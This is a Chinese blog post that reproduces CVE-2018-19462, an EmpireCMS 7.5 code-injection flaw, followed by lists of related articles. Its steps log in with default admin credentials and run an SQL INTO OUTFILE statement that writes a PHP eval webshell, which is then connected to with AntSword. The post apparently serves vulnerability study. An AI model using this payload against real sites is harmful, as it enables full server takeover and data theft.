帝国CMS代码注入(CVE-2018-19462)

最新推荐文章于 2024-11-19 16:31:31 发布

慕筱蚺

最新推荐文章于 2024-11-19 16:31:31 发布

阅读量578

点赞数 1

CC 4.0 BY-SA版权

文章标签：安全网络

本文链接：https://blog.csdn.net/m0_65150886/article/details/136209842

漏洞描述：

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。

复现过程：

1.访问http://ip:port，出现如下页面，开始实验

2.访问管理员登录界面

http://ip:port/empirecms/e/admin/

3.使用账号密码登录

账号：admin

密码：123456

4.点击系统，备份与恢复数据，执行SQL语句

5.输入以下poyload，并执行SQL语句

select '<?php @eval($_POST[1])?>' into outfile '../../../var/www/html/empirecms/shell.php'

6.蚁剑连接

http://ip:port/empirecms/e/admin/getshell.php

借此漏洞攻击者获取到网站的shell权限，控制整个网站，可以进行文件读取和命令执行。

修复建议：

1.升级版本。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

慕筱蚺

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令

杨秀璋的专栏

02-21

2万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了微软证书漏洞（CVE-2020-0601），并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程，第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章，希望对您有所帮助。

【超详细的WEB指纹识别】

最新发布

m0_74823524的博客

12-19

1733

因为CDN的价格问题，并非所有的网站都会有CDN，在一些访问量很小的子站，或者子站与主站在同一个服务器或者C段内的，可能没有布置有CDN。在于内容的存储和分发，将中心平台的内容存储在其它节点，当用户访问时，无需跨越多个节点直接访问源站，而是访问离他最近的一个CDN节点（也叫“边缘节点”），其实就是缓存了原站内容的代理服务器。CDN资源的访问和之前分享过一篇DNS，也就是域名解析过程很类似，也是先访问最近的原边节点，如果边缘节点没有用户需要的资源后，再去访问区域节点，区域节点也没有，最后再到中心节点。

参与评论您还未登录，请先登录后发表或查看评论

empire-CVE-2018-19462

m0_51369969的博客

07-13

441

http://192.168.11.139:35142/ 后台：http://192.168.11.139:35142/empirecms/e/admin/admin/123456 http://192.168.11.139:35142/empirecms/e/admin/admin.php?ehash_gipV2=fxgYwmocc0xpMHh8YfdW 执行SQL语句 http://192.168.11.139:35142/empirecms/getshell_2.php...

帝国软件SQL注入

小强的博客

12-07

3447

以前挖的，现在发出来，好像还没有修复，帝国网站管理系统7.2正式版或者以前版本后台注入漏洞，这个漏洞需要管理员权限，所以比较鸡肋。先看源代码，漏洞主要在函数editcalss函数中，在文件upload\e\class\classfunc.php中：函数代码如下： function EditClass($add,$userid,$username){ global

帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462)

WY92139010的博客

08-16

1484

帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 一、漏洞描述 EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。二、影响版本 EmpireC...

【CVE-2018-19462】帝国CMS(EmpireCMS) v7.5 代码注入

qq_46487664的博客

04-06

1111

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。

帝国php被注入,帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462)

weixin_34369440的博客

03-20

1009

帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462)一、漏洞描述EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。二、影响版本EmpireCMS<=7.5三、环...

代码审计(2)：EmpireCMS SQL注入(CVE-2022-36984)

gj204106的博客

09-21

265

该漏洞产生在后台，需要登录后台，略显鸡肋。

Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞

2401_86951451的博客

09-12

1479

如果有waf拦截web流量就走加密传输，如果始终连接不上就要一步步的进行排查。这里可以在一句话密码后面输出一个echo 123，通过是否有回显来探测哪一步没有完善导致连接不成功。

2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1)，双非渣本网络安全四年磨一剑

2401_84263282的博客

05-05

1302

我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用，当secure_file_priv = 为空，则可以写入sql语句到数据库，当secure_file_priv = NULL，则不可以往数据库里写sql语句，当secure_file_priv = /xxx，一个指定目录的时候，就只能往这个指定的目录里面写东西。漏洞原理：url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。

网络安全之SQL注入漏洞复现（上篇）（技术进阶）

weixin_70911257的博客

04-12

2540

SQL注入（SQL Injection）是一种常见的网络攻击手段，是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码，在应用程序未授权的情况下执行任意的SQL语句。

帝国CMS存在SQL注入漏洞（CNVD-2024-4321448、CVE-2023-50073）

护卫神的博客

11-19

731

帝国CMS（EmpireCMS）是一款非常出名的网站管理系统，用户也非常多。国家信息安全漏洞共享平台于2024-11-06公布其存在SQL注入漏洞。

帝国php被注入,帝国cms因大意导致360检测出“[高危]SQL注入漏洞（盲注）

weixin_34142444的博客

03-20

496

使用一个时间转换函数，在时间输出到页面的时候转换一下即可。function TimeTurner($time) {$minute = date("H:i",$time);$hour = date("H:i",$time);$alltime = date("y-m-d H:i",$time);$time = time() - $time;if ($time < 60) {$str = ' 刚刚...

使用帝国cms开发的网站，这些留言反馈的信息是注入吗？

02-24

941

有网站安全问题没有？

Web安全 | EmpireCMS漏洞常见漏洞分析及复现

Javachichi的博客

03-05

2910

本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。

EmpireCMS4.5 渗透测试及靶场搭建（漏洞复现）

Continuejww的博客

08-30

3184

成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。

《帝国网站管理系统》扩展SQL程序编写介绍

weixin_34396103的博客

05-26

164

基本范例：说明：下面例子都是以PHP文件放在系统根目录为基准。例1：连接MYSQL程序。(a.php) <?php require('e/class/connect.php'); //引入数据库配置文件和公共函数文件 require...

帝国CMS(EmpireCMS) v7.5 前台XSS漏洞复现

小赵同学的博客

02-23

2718

一. 漏洞描述该漏洞是由于JavaScript获取url的参数，没有经过任何过滤直接当作a标签和img标签的href属性和src属性输出二. 漏洞复现需要开启会员空间功能，登录后台开启会员空间功能（系统设置>用户设置>开启会员空间）漏洞出现的我位置是/e/Viewimg/index.html 浏览代码，发现代码存在漏洞分析代码：通过Request函数获取地址栏的url，并作为img和a标签的src属性和href属性然后经过document.with输出到页面跟进R

帝国php漏洞,EmpireCMS(帝国cms)csrf getshell

weixin_30564897的博客

03-18

662

漏洞作者： ../帝国cms默认添加栏目时候默认是允许投稿。另外帝国的会员中心基本都是开启的，有的就算不开启也是可以匿名投稿。漏洞证明：图1所示，帝国添加栏目时候默认是开启投稿的。图2所示，虽然过滤的，但是未过滤img中的污染数据。这个地方插入也就是http://127.0.0.1/1.js，1.js代码看这里 WooYun: 帝国CMS CSRF GetShell图3所示：管理员看到未审核内容时...